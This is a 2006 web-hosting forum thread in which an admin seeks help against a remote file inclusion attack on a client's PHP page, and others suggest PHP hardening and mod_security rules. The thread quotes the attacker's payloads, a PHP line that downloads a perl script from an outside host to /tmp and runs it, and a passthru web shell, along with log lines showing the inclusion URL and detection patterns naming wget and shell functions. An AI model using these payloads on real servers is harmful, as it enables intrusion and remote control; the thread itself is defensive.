Help, hacker uploading files /tmp with external PHP code

jeroman8

Well-Known Member
Mar 14, 2003
410
0
166
Hi!

A hacker is uploading shell scripts to /tmp on one server through a clients php script.
The way he is doing this is going to my client's index2.php file and the adding a command in the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's php commands in the file.
You can probably see it live by going to the urls in log below.

Anyway - any idea on how to stop this ?
Disable a funktion in PHP maybe but hopefully non that will affect other clients.
Or a mod_sec rule maybe.
I have blocket his IP offcourse as welll as the server the php commands on.


m.gif=

<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>

pass.gif=

<?
passthru($_GET['cmd']);
?>

/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
 

claudio

Well-Known Member
Jul 31, 2004
201
0
166
Most of this files would be empty or not harmful if you disable = "system, exec" in your php.ini also set safe mode = on (you can disable some of the safe mode individually on your httpd.conf if some customer require)

i wrote a small perl script that i use as a cron each 10 minutes looking for strange files in my /tmp

then by the time i can grep all .php in domlogs and the execute some of the pages in order to discover which of then is causing the file injection or jamming it on /tmp

good luck ; )

Claudio
 

jackie46

BANNED
Jul 25, 2005
536
0
166
claudio said:
Most of this files would be empty or not harmful if you disable = "system, exec" in your php.ini also set safe mode = on (you can disable some of the safe mode individually on your httpd.conf if some customer require)
Really, care to enlighten all of use as to how you would disable safe mode on an individual basis?
 

mOdY

Well-Known Member
Dec 25, 2004
80
0
156
claudio said:
Most of this files would be empty or not harmful if you disable = "system, exec" in your php.ini also set safe mode = on (you can disable some of the safe mode individually on your httpd.conf if some customer require)

i wrote a small perl script that i use as a cron each 10 minutes looking for strange files in my /tmp

then by the time i can grep all .php in domlogs and the execute some of the pages in order to discover which of then is causing the file injection or jamming it on /tmp

good luck ; )

Claudio
nice thingy, would be nice if you shared it with us. :cool:
 

HostMerit

Well-Known Member
Oct 24, 2004
163
0
166
New Jersey, USA
cPanel Access Level
DataCenter Provider
Get mod_security and a good ruleset, and use this code:

SecFilter "page=http"

The problem is poorly written PHP code that just fopen's a page / URL and doesn't check / use an array to grab from.
 

destr0yr

Well-Known Member
May 4, 2004
58
0
156
Kelowna, BC.
Upgrading your PHP CMS/blog/forum/whatever would be the ultimate solution. index2.php looks mambo-ish. make sure you client is running the most current version - go so far as to disable their site until they do upgarde. Security should be as large an issue for them as it is for you (IMHO).

As for mod_security, use it, love it, embrace it, be one with it.

Current ruleset that works for me:
Code:
# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST "wget "

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname -a"

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup"

# WEB-ATTACKS .htaccess access
SecFilterSelective THE_REQUEST "\.htaccess"

# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"

# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"

# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."

# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"

# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"

# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"

# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"

# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"

# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass

# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"

# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"

# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST "/~nobody"

# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"

# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"

# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"

#More PHPBB worms
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)"
 

Nick A

Member
Jan 16, 2005
23
0
151
Canada
jeroman8 said:
Hi!

A hacker is uploading shell scripts to /tmp on one server through a clients php script.
The way he is doing this is going to my client's index2.php file and the adding a command in the end so it will query/go to a file placed on another server.
This file is called m.gif but it's not an image, it's php commands in the file.
You can probably see it live by going to the urls in log below.

Anyway - any idea on how to stop this ?
Disable a funktion in PHP maybe but hopefully non that will affect other clients.
Or a mod_sec rule maybe.
I have blocket his IP offcourse as welll as the server the php commands on.


m.gif=

<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>

pass.gif=

<?
passthru($_GET['cmd']);
?>

/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET
/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 -
"http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
Hi Have u run /scripts/securetmp before?
 

HostMerit

Well-Known Member
Oct 24, 2004
163
0
166
New Jersey, USA
cPanel Access Level
DataCenter Provider
Securetmp wouldn't help, as it's running a perl script.

You can try chmod 750 /usr/bin/wget and also chmod 750 /usr/bin/curl

As curl is being used to download the item. Many different ways to secure against this attack.
 

jeroman8

Well-Known Member
Mar 14, 2003
410
0
166
Thanks guys for your help in this matter!

Upgrading the script is not easy since it's not a public script.
noexec/securetmp for temp is off course already done but that doesn't help, never did.
I already use almost all Hostmerits mod_sec rules but blocking "http" will block all "good" requests also and is to much on this server since many use external images, include pages etc with php. Off course security should come first but theres a client/money issue also.
chmod 750 curl and wget is the same thing as removing the functions for the clients - many use it.

However disable "system" seems to fix this issue with this script !!

I also have a script checking /tmp and any other catalog I like.
I set what it should look for and not look for and where and then it email whenever
for exempal a "hack.pl" och "bc.tar"....is being created in /tmp.

You can find it and other good scripts here:
http://forums.cpanel.net/showthread.php?t=25672&highlight=PWS+monitor
 
Last edited:

rogcan

Well-Known Member
Jun 7, 2004
48
0
156
How do you add that ruleset for mod_security by the way ??

Can i get a step by step instruction for that please as i would like to use yours destr0yr :)
 

ramprage

Well-Known Member
Jul 21, 2002
651
0
166
Canada
destr0yr

The ruleset destr0yr is using looks like the default for mod_security and won't help much.

You need to login by shell and have the ruleset edited then restart apache. If you have more questions about this PM me.